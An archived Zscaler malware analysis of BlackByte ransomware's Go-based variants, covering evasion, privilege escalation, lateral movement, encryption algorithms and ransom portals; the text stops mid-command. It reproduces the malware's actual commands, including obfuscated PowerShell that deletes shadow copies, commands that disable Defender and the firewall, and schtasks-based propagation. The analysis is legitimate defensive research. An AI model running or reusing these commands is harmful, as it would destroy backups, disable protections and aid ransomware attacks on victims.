{
	"id": "7d9c188d-adc0-4c25-b8a5-d96eba3007c5",
	"created_at": "2026-04-06T00:08:27.785898Z",
	"updated_at": "2026-04-10T03:32:24.838959Z",
	"deleted_at": null,
	"sha1_hash": "ddb360297952664ea21eeb89f768a4588d2d0625",
	"title": "Analyzing BlackByte Ransomware's Go-Based Variants | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4312083,
	"plain_text": "Analyzing BlackByte Ransomware's Go-Based Variants | Zscaler\r\nBy Javier Vicente Vallejo, Brett Stone-Gross\r\nPublished: 2022-05-03 · Archived: 2026-04-05 20:43:02 UTC\r\nKey Points\r\nBlackByte is a full-featured ransomware family that first emerged around July 2021\r\nThe ransomware was originally written in C# and later redeveloped in the Go programming language around\r\nSeptember 2021\r\nThe threat group exfiltrates data prior to deploying ransomware and leaks the stolen information if a ransom is not\r\npaid\r\nThe group has demanded multi-million dollar ransoms from some victims\r\nBlackByte ransomware employs various anti-analysis techniques including a multitude of dynamic string obfuscation\r\nalgorithms\r\nIn early versions of the ransomware, file encryption utilized a hardcoded 1,024-bit RSA public key along with a 128-\r\nbit AES key that was derived from a file retrieved from a command and control server\r\nMore recent BlackByte versions use Curve25519 Elliptic Curve Cryptography (ECC) for asymmetric encryption\r\nand ChaCha20 for symmetric file encryption\r\nIntroduction\r\nBlackByte is a Ransomware-as-a-Service (RaaS) group that has been targeting corporations worldwide since July 2021.\r\nPrevious versions of the ransomware were written in C#. More recently, the authors redeveloped the ransomware using the\r\nGo programming language. The BlackByte Go variant was used in attacks described in an FBI advisory that warned\r\nBlackByte had compromised numerous businesses, including entities in US critical infrastructure sectors. In this post,\r\nZscaler ThreatLabz analyzes two variants of the Go-based implementation of BlackByte ransomware.\r\nTechnical Analysis\r\nThreatLabz has identified two variants of the Go-based variant of BlackByte. The first variant was seen in-the-wild around\r\nSeptember 2021 and shares many similarities with the C# version including the commands executed to perform lateral\r\npropagation, privilege escalation, and file encryption algorithms. A more recent Go-based variant was introduced around\r\nFebruary 2022. This new variant introduced many additional features and updated the file encryption algorithms. In this\r\nblog, for brevity, the Go-based BlackByte variant 1 will be referred to as BlackByte v1 and the second variant will be\r\nreferred to as BlackByte v2.\r\nInitialization\r\nBefore BlackByte performs file encryption, the ransomware first performs initialization. Most of these initialization\r\nfunctions are very similar or identical to the C# variant of BlackByte.\r\nMutex Creation\r\nBlackByte creates a mutex using a value that is hardcoded in the malware, for example: Global\\7b55551e-a59c-4252-a34a-5c80372b3014. If the mutex exists, BlackByte will terminate. This ensures that there is only one active instance of\r\nBlackByte running at a time.\r\nIdentify System Language\r\nBlackByte ransomware resolves the victim's system language by comparing the language ID values with those shown in\r\nTable 1. If the system language matches any from this list, BlackByte will exit without performing file encryption.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 1 of 21\n\nLanguage ID Language\r\n1049 Russian\r\n1058 Ukrainian\r\n1059 Belarusian\r\n1064 Tajik\r\n1067 Armenian\r\n1068 Azerbaijani Latin\r\n1079 Georgian\r\n1087 Kazakh\r\n1090 Turkmen\r\n1091 Uzbek Latin\r\n2092 Azerbaijani Cyrillic\r\n2115 Uzbek Cyrillic\r\nTable 1. System languages avoided by BlackByte ransomware\r\nThese languages are specifically avoided by BlackByte to prevent encrypting files on systems that are located in\r\nCommonwealth of Independent States (CIS) countries. This likely indicates that the threat actors behind BlackByte are\r\nlocated in Eastern Europe and/or Russia. This is designed to reduce the threat that local law enforcement in those regions\r\nwill pursue criminal prosecution against those responsible for BlackByte.\r\nEnable Long Paths\r\nThe malware executes the following command to avoid issues that may occur when encrypting files with long path names:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem /v LongPathsEnabled /t\r\nDisable Controlled Folder Access\r\nBlackByte executes the following command to disable controlled folder access:\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 2 of 21\n\nSet-MpPreference -EnableControlledFolderAccess Disabled\r\nThe Windows controlled folder access feature is designed to protect data from malicious applications such as ransomware.\r\nWhen enabled, files located in the specified protected folders can not be modified by unauthorized applications.\r\nDelete Shadow Copies\r\nSimilar to other ransomware families, BlackByte deletes shadow copies to prevent a victim from easily recovering files from\r\nbackups. There are two methods that BlackByte uses to delete shadow copies. The first executes the following PowerShell\r\ncommand:\r\n$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagB\r\n'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+\r\n'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x\r\nThe Base64 encoding string when decoded is the following: Get-WmiObject Win32_Shadowcopy | ForEach-Object\r\n{$_.Delete();}\r\nBlackByte also executes the commands to delete shadow copies for each drive:\r\nC:\\WINDOWS\\system32\\cmd.exe /c vssadmin resize shadowstorage /for=: /on=: /maxsize=401MB\r\nC:\\WINDOWS\\system32\\cmd.exe /c vssadmin resize shadowstorage /for=: /on=: /maxsize=unbounded\r\nProcess Termination and Stop / Start Services\r\nThe following commands are executed by BlackByte to stop services that may hinder file encryption:\r\nC:\\WINDOWS\\system32\\sc.exe config SQLTELEMETRY start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SQLTELEMETRY$ECWDB2 start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SQLWriter start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SstpSvc start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config MBAMService start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config wuauserv start= disabled\r\nBlackByte will also start the following services:\r\nC:\\WINDOWS\\system32\\sc.exe config Dnscache start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config fdPHost start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config FDResPub start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config SSDPSRV start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config upnphost start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config RemoteRegistry start= auto\r\nBlackByte ransomware terminates the following processes shown in Table 2 at the beginning of the execution:\r\nuranium processhacker procmon pestudio procmon64\r\nx32dbg x64dbg cffexplorer procexp64 procexp\r\npslist tcpview tcpvcon dbgview rammap\r\nrammap64 vmmap ollydbg autoruns autorunsc\r\nregmon idaq idaq64 immunitydebugger wireshark\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 3 of 21\n\ndumpcap hookexplorer importrec petools lordpe\r\nsysinspector proc_analyzer sysanalyzer sniff_hit windbg\r\njoeboxcontrol joeboxserver joeboxserver resourcehacker fiddler\r\nhttpdebugger dumpit rammap rammap64 vmmap\r\nagntsvc cntaosmgr dbeng50 dbsnmp encsvc\r\nexcel firefox firefoxconfig infopath isqlplussvc\r\nmbamtray msaccess msftesql mspub mydesktopqos\r\nmydesktopservice mysqld mysqld-nt mysqld-opt Ntrtscan\r\nocautoupds ocomm ocssd onenote oracle\r\noutlook PccNTMon powerpnt sqbcoreservice sql\r\nsqlagent sqlbrowser sqlservr sqlwriter steam\r\nsynctime tbirdconfig thebat thebat64 thunderbird\r\ntmlisten visio winword wordpad xfssvccon\r\nzoolz filemon nsservice nsctrl  \r\nTable 2. Process names terminated by BlackByte ransomware\r\nMany of these process names are related to business applications. BlackByte kills these processes to avoid open file handle\r\npermission issues when performing file encryption of the victim's files. In addition, the list contains a large number of\r\nmalware analyst tools that can be used to reverse engineer the functionality of the ransomware.\r\nBlackByte also terminates the following services that are associated with antivirus products, backup software, and business\r\napplications including financial software, email clients, and databases as shown below in Table 3.\r\nklvssbridge64 vapiendpoint ShMonitor Smcinst SmcService\r\nSntpService svcGenericHost swi_ TmCCSF tmlisten\r\nTrueKey TrueKeyScheduler TrueKeyServiceHelper WRSVC McTaskManag\r\nOracleClientCache80 mfefire wbengine mfemms RESvc\r\nmfevtp sacsvr SAVAdminService SAVService SepMasterServ\r\nPDVFSService ESHASRV SDRSVC FA_Scheduler KAVFS\r\nKAVFSGT kavfsslp klnagent macmnsvc masvc\r\nMBAMService MBEndpointAgent McShield audioendpointbuilder Antivirus\r\nAVP DCAgent bedbg EhttpSrv MMS\r\nekrn EPSecurityService EPUpdateService ntrtscan EsgShKernel\r\nmsexchangeadtopology AcrSch2Svc MSOLAP$TPSAMA\r\nIntel(R) PROSet\r\nMonitoring\r\nmsexchangeim\r\nARSM unistoresvc_1af40a ReportServer$TPS MSOLAP$SYSTEM_BGC W3Svc\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 4 of 21\n\nMSExchangeSRS ReportServer$TPSAMA Zoolz 2 Service MSOLAP$TPS aphidmonitors\r\nSstpSvc MSExchangeMTA ReportServer$SYSTEM_BGC\r\nSymantec System\r\nRecovery\r\nUI0Detect\r\nMSExchangeSA MSExchangeIS ReportServer MsDtsServer110 POP3Svc\r\nMSExchangeMGMT SMTPSvc MsDtsServer IisAdmin MSExchangeE\r\nEraserSvc11710\r\nEnterprise Client\r\nService\r\nMsDtsServer100 NetMsmqActivator stc_raw_agent\r\nVSNAPVSS PDVFSService AcrSch2Svc Acronis CASAD2DWe\r\nCAARCUpdateSvc McAfee avpsus DLPAgentService mfewc\r\nBMR Boot Service DefWatch ccEvtMgr ccSetMgr SavRoam\r\nRTVscan QBFCService QBIDPService Intuit.QuickBooks.FCS QBCFMonitor\r\nYooIT zhudongfangyu nsService veeam backup\r\nsql memtas vss sophos svc$\r\nmepocs wuauserv      \r\nTable 3. Service names terminated by BlackByte ransomware\r\nWindows Firewall\r\nBlackByte disables the Windows firewall via the command: \r\nnetsh advfirewall set allprofiles state off\r\nWindows Defender\r\nThe ransomware executes the following command to delete task manager, resource monitor, and stop the Windows Defender\r\nservice:\r\ncmd /c del C:\\Windows\\System32\\Taskmgr.exe /f /q \u0026 del C:\\Windows\\System32\\resmon.exe /f /q \u0026\r\npowershell -command \"$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String\r\n('V'+'wBp'+'A'+'G4AR'+'AB'+'lAG'+'YAZQBuAGQA'));Stop-Service -Name $x;Set-Service -StartupType Disabled \r\nThe Base64 encoded string above decodes to WinDefend.\r\nRaccine Anti-Ransomware\r\nBlackByte terminates and uninstalls an anti-ransomware product known as Raccine. The Raccine processes that are\r\nterminated are raccine.exe and raccinesettings.exe. To uninstall Raccine, BlackByte deletes the following registry keys and\r\nvalues:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Raccine Tray\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine\r\nHKEY_CURRENT_USER\\SOFTWARE\\Raccine\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Raccine\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 5 of 21\n\nBlackByte then deletes Raccine's scheduled task via the command:\r\nC:\\WINDOWS\\system32\\schtasks.exe /DELETE /TN \"\\\"Raccine Rules Updater\\\"\" /F\r\nPrivilege Escalation\r\nThe ransomware executes the following commands to disable UAC remote restrictions:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v Local\r\nBlackByte sets the EnableLinkedConnections registry value to force symbolic links to be written to link logon sessions as\r\nfollows:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v Enabl\r\nIn BlackByte v2, an additional privilege escalation method was added that exploits the CMSTPLUA COM interface to\r\nbypass UAC. The ShellExec method of the interface ICMLuaUtil can be invoked with arbitrary commands with elevated\r\nprivileges using the ElevationMoniker Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.\r\nThis allows BlackByte v2 to execute the svchost.exe process that it injects into with elevated privileges. This privilege\r\nescalation technique has also been utilized by other ransomware groups including REvil and LockBit.\r\nLateral Propagation\r\nBlackByte ransomware performs network enumeration and can propagate across a local network. First it executes the\r\nfollowing commands to enable network discovery and file and printer sharing:\r\nC:\\WINDOWS\\system32\\cmd.exe /c netsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\"\" new enable=Ye\r\nC:\\WINDOWS\\system32\\cmd.exe /c netsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\"\" new en\r\nThe following commands are then executed to discover other computers and network file shares:\r\nnet view\r\narp -a\r\nBlackByte loads the Active Directory module RSAT-AD-PowerShell and queries for other computers via the following\r\ncommands:\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Install-WindowsFeature -Name \\\"RSAT-AD-PowerShell\\\"\r\npowershell -command \"Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name\"\r\nIf the -a flag is passed via the command-line, BlackByte attempts to copy itself to remote computer's public folders via the\r\nadministrative share \\\\\\c$\\Users\\Public\\. If that attempt is unsuccessful, BlackByte will default to the path: \\\\\\Users\\Public\\.\r\nBlackByte uses the Windows task scheduler to execute the ransomware on the remote host using the following command:\r\nC:\\Windows\\system32\\schtasks.exe /Create /S /TN /TR \"C:\\Users\\Public\\ -s \" /ru SYSTEM /sc onlogon /RL HIGHES\r\nIn BlackByte v2, the filename and task name are pseudorandomly generated using a function that produces eight upper and\r\nlowercase alphabetic and numeric characters (e.g., BqgDOVYL.exe and KYL8EpE9, respectively). BlackByte v1 uses a\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 6 of 21\n\nhardcoded filename and command-line argument complex.exe -single and the hardcoded task name asd.\r\nAfter scheduling the task, the remote BlackByte binary is executed using the command:\r\nC:\\Windows\\system32\\schtasks.exe /S /Run /TN\r\nAfter the task is executed, BlackByte deletes the remote task using the command:\r\nC:\\Windows\\system32\\schtasks.exe /Delete /S /TN /f\r\nBlackByte then deletes the copy of itself on the remote host network share. BlackByte also attempts to access administrative\r\nshares A$ through Z$ and the folders shown in Table 4.\r\nUsers Backup Veeam Consejo homes\r\nhome media common Storage Server Public\r\nWeb Images Downloads BackupData ActiveBackupForBusiness\r\nBackups NAS-DC DCBACKUP DirectorFiles share\r\nTable 4. Network shares targeted by BlackByte ransomware\r\nCheck for Analysis Tools\r\nThe malware checks the following DLL modules in memory shown in Table 5 and exits if they are present:\r\nDLL Filename Description\r\nDBGHELP.DLL Windows DbgHelp Library\r\nSbieDll.dll Sandboxie\r\nSxIn.dll Qihu 360 Total Security\r\nSf2.dll Avast Antivirus\r\nsnxhk.dll Avast Antivirus\r\ncmdvrt32.dll COMODO Internet Security\r\nTable 5. DLLs Identified by BlackByte ransomware\r\nDisable Debugging\r\nBlackByte attempts to prevent debugging tools from monitoring and attaching to various processes by removing the\r\nfollowing registry values under SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options:\r\nvssadmin.exe\r\nwbadmin.exe\r\nbcdedit.exe\r\npowershell.exe\r\ndiskshadow.exe\r\nnet.exe\r\ntaskkill.exe\r\nwmic.exe\r\nfsutil.exe\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 7 of 21\n\nProcess Injection\r\nBlackByte v1 injects the ransomware code in an instance of regedit.exe, while BlackByte v2 injects itself into an instance of\r\nsvchost.exe. After the process is injected with the ransomware code, the file encryption is then performed in the context of\r\nthe regedit.exe or svchost.exe process. BlackByte then deletes its original binary on disk by executing the command:\r\nC:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 \u003e Nul \u0026 Del /F /Q\r\nThe ping command is used to delay the file deletion by 10 seconds. The process injection functionality may be able to\r\nbypass some security software detections.\r\nUnmount Virtual Machine Images\r\nIn order to identify virtual machines on the victim's system, BlackByte will execute the command:\r\npowershell Get-VM\r\nIf any virtual machine files are located, BlackByte will attempt to unmount the image by executing the following command\r\nline:\r\npowershell.exe Dismount-DiskImage -ImagePath\r\nBackup Volumes\r\nThe malware executes mountvol.exe to try to mount additional volumes:\r\nC:\\WINDOWS\\system32\\mountvol.exe A: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe B: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe E: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe F: \\\\?\\Volume{[GUID]}\\\r\nThis is likely an attempt to mount and encrypt backup volumes to further prevent file recovery after encryption.\r\nFile Encryption\r\nBlackByte enumerates all physical drives and network shares skipping files that contain the following substrings in Table 6:\r\nblackbyte ntdetect.com bootnxt ntldr recycle.bin\r\nbootmgr thumbs.db ntuser.dat bootsect.bak autoexec.bat\r\niconcache.db bootfont.bin      \r\nTable 6. BlackByte ransomware file substring filter list\r\nBlackByte avoids the following extensions shown in Table 7.\r\nurl msilog log ldf lock\r\ntheme msi sys wpx cpl\r\nadv msc scr key ico\r\ndll hta deskthemepack nomedia msu\r\nrtp msp idx ani 386\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 8 of 21\n\ndiagcfg bin mod ics com\r\nhlp spl nls cab exe\r\ndiagpkg icl ocx rom prf\r\nthemepack msstyles icns mpa drv\r\ncur diagcab cmd shs  \r\nTable 7. File extensions skipped by BlackByte ransomware\r\nBlackByte will also skip files located in the following directories shown in Table 8.\r\nbitdefender trend micro avast software intel common files\r\nprogramdata windowsapps appdata mozilla application data\r\ngoogle windows.old system volume information program files (x86) boot\r\ntor browser windows intel perflogs msocache\r\nTable 8. Directories whitelisted by BlackByte ransomware\r\nBlackByte optimizes encryption speed based on the targeted file size according to the following rules:\r\nFilesize Encryption Algorithm\r\nSize Encrypt the entire file\r\n15MB \u003e= Size \u003e 5MB Encrypt the first 1MB and last 1MB\r\n150MB \u003e= Size \u003e 15MB Encrypt the first 5MB and last 5MB\r\nSize \u003e 150MB Encrypt the first 50MB and last 50MB\r\nBlackByte renames encrypted files with the extension .blackbyte. The ransomware creates a DefaultIcon registry key under\r\nHKEY_CLASSES_ROOT\\.blackbyte that points to an icon file, so that every file that is encrypted will show this icon in\r\nWindows explorer. In addition, the registry names s1159 and s2359 are set to BLACKBYTE under\r\nHKEY_CURRENT_USER\\Control Panel\\International. These registry values control the time format for AM/PM. As a\r\nresult, Windows will show BLACKBYTE instead of AM/PM as shown below in Figure 2.\r\nFigure 2. BlackByte AM/PM time format modification\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 9 of 21\n\nThis time format modification is performed by executing the commands:\r\nreg add \"HKCU\\Control Panel\\International\" /v s1159 /t REG_SZ /d BLACKBYTE /f\r\nreg add \"HKCU\\Control Panel\\International\" /v s2359 /t REG_SZ /d BLACKBYTE /f\r\nFile Encryption Algorithms (Variant 1)\r\nBlackByte v1 must be executed with the command line argument -single followed by a SHA256 hash. This hash is\r\ncombined with a TOR onion URL (e.g., hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad[.]onion/).\r\nThe SHA256 hash given as an argument is concatenated to the onion URL to build the URL of the victim ransom portal that\r\nis embedded in the ransom note. This URL is substituted in the [LINK] field of the ransom note template.\r\nWhen BlackByte v1 is executed, the malware tries to connect to a hardcoded URL that hosts a file that is involved in the\r\nconstruction of an AES key that is used to encrypt a victim's files. An example URL used for this purpose\r\nwas hxxps://185.93.6[.]31/mountain.png. The mechanism used to build the AES key is very similar to the C# variant.\r\nAfter the content of the file mountain.png is downloaded, BlackByte reads the first 16 bytes of the file into a buffer and 24\r\nbytes at the offset 0x410 of the file into another buffer. These 24 bytes are used as key to create and initialize a\r\nNewTripleDESCipher object from the Go Cryptographic API. This object is used to decrypt the first 16 bytes of the file\r\nmountain.png. The resulting 16-byte buffer will be used as a PBKDF2 password to derive the AES key that will be used to\r\nencrypt the victim's files. The BlackByte PBKDF2 algorithm uses SHA1 as the hashing function and 1,000 iterations to\r\nderive the AES key. The password is converted to unicode and the unicode string BLACKBYTE_IS_COOL is used as the\r\nsalt. The following example Python code can be used to derive the AES key used for file encryption.\r\nFigure 3. Python code to decrypt BlackByte v1 files with the file (e.g., mountain.png) downloaded from the C2 server\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 10 of 21\n\nVictim's files are encrypted with AES using CBC mode. The first 16 bytes of the PBKDF2 derived key are used as AES key,\r\nand the same 16 bytes are used as the initialization vector (IV). The same AES key is used to encrypt all the files on a\r\nvictim's machine.\r\nThe PBKDF2 password is encrypted with a hardcoded 1,024-bit RSA public key and the resulting RSA-encrypted value is\r\nencoded with Base64. This Base64 encoded string is substituted in the [KEY] field in the ransom note template. The threat\r\nactor can decrypt the PBKDF2 password with their corresponding RSA private key, derive the AES key, and thereafter,\r\ndecrypt the victim's encrypted files. The following is an example RSA public key that was hardcoded in BlackByte:\r\n-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUBwECQuQiVGorPYvHrJM11OWV\r\nE1PS8gaBqIAfPaR1rQHUEXu3iX/da/dCtV8Z27/SIA/ZYUNhTyUsX9Snjz8zve90\r\nQAiG1c/BS81WWRax7M7i1rESStVwOaUDAj5w6cz9GwDMGYI+wve9Qyjtw5R6hr5I\r\nqlIEig1Wy1X27vUC2wIDAQAB\r\n-----END PUBLIC KEY-----\r\nRansom Note and BlackByte Icon (Variant 1)\r\nThe BlackByte ransom note and an image containing an icon file are stored as Base64 encoded strings in the binary. After\r\nthe encryption of the victim's files, the ransom note is written to a file named BlackByteRestore.txt, and the previously\r\nmentioned icon file is written to a file named BB.ico. An example BlackByte v1 ransom note template is shown below in\r\nFigure 4. The BlackByte logo uses the extended ASCII characters of the 8-bit code page 437 to create 3-D block letters.\r\nFigure 4. Go-based BlackByte v1 ransom note template\r\nFile Encryption Algorithms (Variant 2)\r\nThe second variant of BlackByte ransomware does not require a network connection to start encryption. In addition, the\r\nransomware's command-line parameters were modified. BlackByte v2 requires two command line parameters:\r\nsample.exe\r\nThe first parameter is a flag (e.g., -a) that controls specific behaviors of the ransomware (e.g., to propagate across a\r\nnetwork), while the second parameter is a passphrase (e.g., 54726956) that is verified before file encryption commences. If\r\nBlackByte is not provided with any command-line arguments, the ransomware prints out the phrase BlackByte ransomware,\r\n8-th generation, the most destructive of all ransomware products, real natural disaster. and exits.\r\nBlackByte v2 removed the RSA and AES file encryption algorithms from the ransomware. The encryption algorithms were\r\nreplaced with Curve25519 elliptic curve cryptography for asymmetric encryption and ChaCha for symmetric algorithm. The\r\nCurve25519 functions are statically compiled within BlackByte using Go library code. BlackByte generates a random 32-\r\nbyte buffer per file using the Windows API function RtlGenRandom(). This random value is used as a file's secret key. The\r\nfile's public key is calculated as follows:\r\nfile_public_key = Curve25519(file_secret_key, base_point = 0x9)\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 11 of 21\n\nThe threat actor's Curve25519 public key is hardcoded in the binary and stored as a Base64 encoded string. For the sample\r\nwith the SHA256 hash ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa, the hardcoded\r\nCurve25519 public key was the string:\r\n2BSTzcpdqRW/a2DRT3TiL9lN5INRmmn1lCQWzZhkfQs=\r\n(d81493cdca5da915bf6b60d14f74e22fd94de483519a69f5942416cd98647d0b)\r\nThe shared secret is derived as follows:\r\nshared_secret = Curve25519(file_secret_key, blackbyte_public_key)\r\nThe shared secret is hashed with SHA256 to derive a 32-byte ChaCha encryption key. The ChaCha encryption key is then\r\nhashed again with SHA256 to derive the ChaCha nonce (using 12 bytes starting at offset 10). Once the ChaCha key\r\nparameters have been derived, they will be used to encrypt the file's content. The encrypted data is written to the file\r\n(overwriting the original content). Finally, the victim's 32-byte public key is concatenated to the encrypted content of the\r\nfile. The BlackByte v2 encryption algorithm is shown below in Figure 5.\r\nFigure 5. BlackByte v2 file encryption algorithm\r\nThe threat actor can use the file's public key together with the threat actor's secret key to recover the shared secret and use it\r\nto decrypt the encrypted data as follows:\r\nshared_secret = Curve25519(blackbyte_secret_key, file_public_key)\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 12 of 21\n\nThe following Python code in Figure 6 can be used to decrypt BlackByte encrypted data from a file that has been encrypted\r\nif the threat actor's private key is obtained:\r\nFigure 6. Python code to decrypt BlackByte v2 files with the threat actor's private key\r\nBlackByte v2 also encrypts the filename after encryption. The encryption is a simple XOR layer with a hardcoded key,\r\nfollowed by Base64 encoding as shown in Figure 7.\r\nFigure 7. BlackByte v2 filename encryption\r\nIn the analyzed sample, the XOR key was fuckyou123. After a filename has been encrypted, the file is renamed and the\r\n.blackbyte extension is concatenated.\r\nThreatLabz has implemented proof-of-concept file decryption code for both BlackByte v1 and v2 here.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 13 of 21\n\nRansom Note and BlackByte Icon (Variant 2)\r\nBlackByte v2 introduced some improvements to storing the ransom note and icon file. The Base64 encoded blocks for the\r\nransom note and icon file added an XOR-based encryption layer. The XOR key to decrypt the ransom note and icon file is\r\nembedded in the ransomware as an obfuscated string. The icon file is written to the victim's %APPDATA% directory using a\r\nrandomly generated filename consisting of six upper and lowercase alphabetic and numeric characters (e.g., i2uOJh.ico).\r\nBlackByte v2 contains a hardcoded TOR onion URL and path for the victim portal rather than relying on the command-line\r\nfor the path value. BlackByte v2 also added a hardcoded password that is required to access the victim ransom portal. An\r\nexample password is:\r\ngkaW_#DD[Aw_JTB@luXpJBdye6eLr@{bx5pHFA)T5FpMYJC]f|@\r\nThe BlackByte v2 ransom note template is shown below in Figure 8. The [LINK] substring in the ransom note is replaced\r\nwith the hardcoded BlackByte victim URL and the [PASSW] substring is replaced with the victim-specific password for the\r\nransom portal.\r\nFigure 8. BlackByte v2 ransom note template\r\nAn example ransom note when populated after file encryption has been performed for BlackByte v2 is shown in Figure 9.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 14 of 21\n\nFigure 9. BlackByte v2 ransom note\r\nA copy of the BlackByte v2 ransom note can be found in the ThreatLabz GitHub repository. After BlackByte encrypts files,\r\nthe ransom note is written to each directory, the encrypted files are renamed, and their icons are replaced by the BlackByte\r\nicon.\r\nRansom Portal and Leak Site\r\nWhen a victim accesses the link in the ransom portal, they are instructed to enter the access key from the ransom note as\r\nshown in Figure 10.\r\nFigure 10. BlackByte victim ransom portal\r\nAfter a victim authenticates, they are provided the ransom demand and instructions how to purchase Bitcoin. There is also a\r\nlive chat feature as shown in Figure 11.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 15 of 21\n\nFigure 11. BlackByte ransom negotiation portal\r\nVictims are further pressured to pay the ransom, or risk having their data publicly leaked on their TOR hidden service as\r\nshown in Figure 12.\r\nFigure 12. BlackByte victim leak site\r\nPrint Bombing\r\nIn addition to dropping a ransom note on the victim's machine, the ransomware sends a message to be printed by any\r\nconnected printers. The printed ransom message is an RTF file with the content shown below:\r\n{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}\r\n{\\*\\generator Riched20 10.0.19041}\\viewkind4\\uc1\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 16 of 21\n\n\\pard\\sa200\\sl276\\slmult1\\qc\\f0\\fs56\\lang9 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\pard\\sa200\\sl276\\slmult1\\par\r\n}\r\nIn BlackByte v1, the message is written to the file C:\\Users\\tree.dll and the following command is executed to print it:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c for /l %x in (1,1 ,75) do start wordpad.exe /p C:\\\\Users\\\\tree.dll\r\nIn addition, a task named Task is created to print the message every hour:\r\nC:\\WINDOWS\\system32\\schtasks.exe /create /np /sc HOURLY /tn Task /tr \"C:\\Windows\\System32\\cmd.exe\r\n/c for /l %x in (1,1,75) do start wordpad.exe /p C:\\Users\\tree.dll\" /st 07:00\r\nIn BlackByte v2, the text of the message is written to a file with a random name consisting of six upper and lowercase\r\nalphabetic and numeric characters. The task name is also created randomly consisting of eight upper and lowercase\r\nalphabetic and numeric characters. An example task command to print the ransom message is shown below:\r\nC:\\WINDOWS\\system32\\schtasks.exe /create /np /sc HOURLY /tn 4y77VPNo /tr \"C:\\Windows\\System32\\cmd.exe\r\n/c for /l %x in (1,1,75) do start 